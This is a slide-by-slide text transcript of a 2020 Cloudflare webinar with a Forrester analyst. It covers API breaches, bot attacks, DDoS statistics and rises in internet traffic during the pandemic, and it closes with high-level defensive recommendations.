What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 

Cybersecurity 2020 threat landscape and its implications (AMER)

  • 1. 1 Cybersecurity 2020 Threat Landscape and its Implications Featuring Guest Speaker from Forrester
  • 2. 2 Today’s Speakers Guest Speaker, Sandy Carielli Principal Analyst Forrester Arun Singh Product Marketing Lead, Security Cloudflare
  • 3. 3 Agenda 1 Security Threat Trends and Implications - 2 Recommendations and Solutions 3 Q&A
  • 5. 5 Cloudflare is an intelligent, integrated global cloud network that delivers security, performance, and reliability for all your Internet infrastructure, people and connected devices. CLOUDFLARE’S MISSION: Help build a better Internet Confidential. Copyright © Cloudflare, Inc.
  • 6. 6 27M+ Internet properties 37 Tbps Of network capacity 200 Cities and 95+ countries 45B Cyber threats blocked each day in Q1 ‘20 99% Of the Internet-connected population in the developed world population is located within 100 milliseconds of our network Help Build A Better Internet 6 Note: Map Data as of Jan, 15, 2020
  • 7. Cybersecurity 2020 Threat Landscape and its Implications Sandy Carielli Principal Analyst
  • 8. 8© 2020 Forrester. Reproduction Prohibited. 33% of firms suffered a breach as a result of an external attack. This is how.
  • 9. 9© 2020 Forrester. Reproduction Prohibited. Some Of The Top Threats In 2020 Are Web App Based Bots APIs Client Side Attacks Forrester Report: “Top Cybersecurity Threats In 2020”
  • 10. 10© 2020 Forrester. Reproduction Prohibited. The New Normal
  • 11. 11© 2020 Forrester. Reproduction Prohibited. Breaches Due To Improperly Secured APIs Common Causes Were Poor Access Control and Unauthenticated API Endpoints https://www.wired.com/story/i-scraped-millions-of-venmo-payments-your-data-is-at-risk/?verso=true https://www.csoonline.com/article/3268025/panera-bread-blew-off-breach-report-for-8-months-leaked-millions-of-customer-records.html https://www.theinquirer.net/inquirer/news/3066805/usps-data-breach-api-flaw https://threatpost.com/t-mobile-alerts-2-3-million-customers-of-data-breach-tied-to-leaky-api/136896/
  • 12. 12© 2020 Forrester. Reproduction Prohibited. https://www.owasp.org/images/5/59/API_Security_Top_10_RC.pdf
  • 13. 13© 2020 Forrester. Reproduction Prohibited. Client Side Validation + Poor API Authorization = Data Leakage 13
  • 14. 14© 2020 Forrester. Reproduction Prohibited. “Magecart Attacks Are A Supply Chain Problem” Forrester Report: “Top Cybersecurity Threats In 2020”
  • 15. 15 Increases in global Internet utilization
  • 16. 16
  • 17. 17 ITALY ● National quarantine ordered on March 9th, 2020 ● 20% increase in utilization
  • 18. 18 Global Trends ● Global increases in traffic in all regions ● Japan and India continue to see increases after a temporary decline in late March
  • 19. 19 ● 250% increase in websites related to kids activities ● Over 100% increase in the top 5 categories Categorical increases
  • 20. 20 Event related traffic declines ● Up to 50% decline in traffic at sporting event sites ● Travel sites experiencing similar declines
  • 22. 22
  • 23. 23 Hospital websites Almost 2x increase in attacks in March and April
  • 24. 24 Since the murder of George Floyd there’s also been a large increase in attacks on US government websites. Cyberattacks against the society The category with the biggest increase in cyberattacks was Advocacy Groups with a staggering increase of 1,120x.
  • 25. 25 Q1 DDoS Trends ● In Q1 2020, 92% of the attacks were under 10 Gbps, compared to 84% in Q4 2019
  • 26. 26 Q1 DDoS Trends ● Majority of the attacks peaked below 1 million packets per second (pps).
  • 27. 27 Q1 DDoS Trends ● 79% of DDoS attacks in Q1 lasted between 30 to 60 minutes, compared to 60% in Q4, which represents a 19% increase.
  • 28. 28 Late March events ● Largest attack mitigated (550 Gbps) ● 55% increase in number of attacks (compared to first half)
  • 29. 29 Late March events ● Largest attack mitigated (550 Gbps) ● 55% increase in number of attacks (compared to first half)
  • 30. 30 Application-level attacks ● United States accounted for the largest number of application-level attacks that Cloudflare blocked
  • 31. 31 Top 4 application attack vectors ● Command Injection ● SQL injection ● File Inclusion ● Fake search engine crawler
  • 32. “Bad bots comprise about 20% of all web traffic.” - “Top Cybersecurity Threats In 2020,” Forrester Report
  • 33. 33© 2020 Forrester. Reproduction Prohibited. The Many Flavors Of Bad Bots Web scraping Credential Stuffing Checkout abuse Inventory hoarding Card fraud Web recon Ad fraud DDoS Business logic Influence fraud
  • 34. 34© 2020 Forrester. Reproduction Prohibited. Bot Attacks Impact Wider Range Of Personas Security Marketing Fraud eCommerce Customer Experience
  • 35. 35 Online Shoe Retailer Valuable inventory was hoarded, damaging brand and reducing revenue ● Premium limited release inventory was being purchased and “hoarded” by bots ● Approx. 75% of all traffic came from bots ● Resulted in high infrastructure costs ● Created bad will for customers ● Cloudflare solved with 0.1% false positive rate
  • 36. 36© 2020 Forrester. Reproduction Prohibited. From Sneakers To Toilet Paper: What Is “Valuable?”
  • 37. 37© 2020 Forrester. Reproduction Prohibited. The New Normal
  • 38. Collaborate And Automate “Siloed teams perform even worse when everything is remote. The friction of work handoffs is further compounded by distance.” - “Agile, DevOps, And COVID-19,” Forrester Blog
  • 39. 39© 2020 Forrester. Reproduction Prohibited. • Enumerate, manage and protect API assets … and don’t trust client-side data! • Protect client-side code • Use bot management tooling to change the economics of bot attacks • Consider how the “new normal” changes how attackers might target your products or services • Invest in automation – but make sure your automations are built on solid processes • Focus on CI/CD integrations and collaboration in remote work situations Recommendations
  • 40. Thank You. © 2020 Forrester. Reproduction Prohibited.